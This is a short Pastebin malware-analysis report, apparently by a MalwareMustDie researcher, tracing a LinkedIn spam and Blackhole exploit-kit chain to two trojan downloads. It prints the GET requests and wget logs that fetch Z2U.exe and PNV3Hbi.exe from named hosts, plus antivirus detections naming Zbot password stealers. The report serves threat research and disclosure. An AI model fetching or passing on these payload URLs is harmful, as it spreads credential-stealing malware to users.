Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- *) Previous report: http://pastebin.com/raw.php?i=z7n6SVxf
- *) Continuation of the Linkedin Spam, BHEK2, PluginDetect e,f, and Citadel InfoStealer(CRYPT to POST/HTTP) AND... finally that payload downloaded THESE TWO MORE Trojans.....
- * GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
- * GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
- --15:43:09-- http://3073.a.hostable.me/Z2U.exe
- => `Z2U.exe'
- Resolving 3073.a.hostable.me... 204.152.255.3
- Connecting to 3073.a.hostable.me|204.152.255.3|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 407,128 (398K) [application/x-msdownload]
- 15:43:12 (180.00 KB/s) - `Z2U.exe' saved [407128/407128]
- --15:43:44-- http://85.18.21.252/PNV3Hbi.exe
- => `PNV3Hbi.exe'
- Connecting to 85.18.21.252:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 407,128 (398K) [application/x-msdos-program]
- 15:43:49 (93.95 KB/s) - `PNV3Hbi.exe' saved [407128/407128]
- VT:
- https://www.virustotal.com/file/fed6336f6a8e4d09d83a9eff1485276434be3377012f7bafc99474bd0a7ce162/analysis/1350456794/
- DrWeb : Trojan.PWS.Panda.3001
- Norman : W32/Krypt.GB
- McAfee-GW-Edition : PWS-Zbot.gen.aln
- nProtect : Trojan/W32.Agent.407128.B
- McAfee : PWS-Zbot.gen.aln
- Fortinet : W32/Kryptik.WDV!tr
- Kingsoft : Win32.Troj.Agent.ai.(kcloud)
- Panda : Suspicious file
- #MalwareMustDie!!!
Add Comment
Please, Sign In to add comment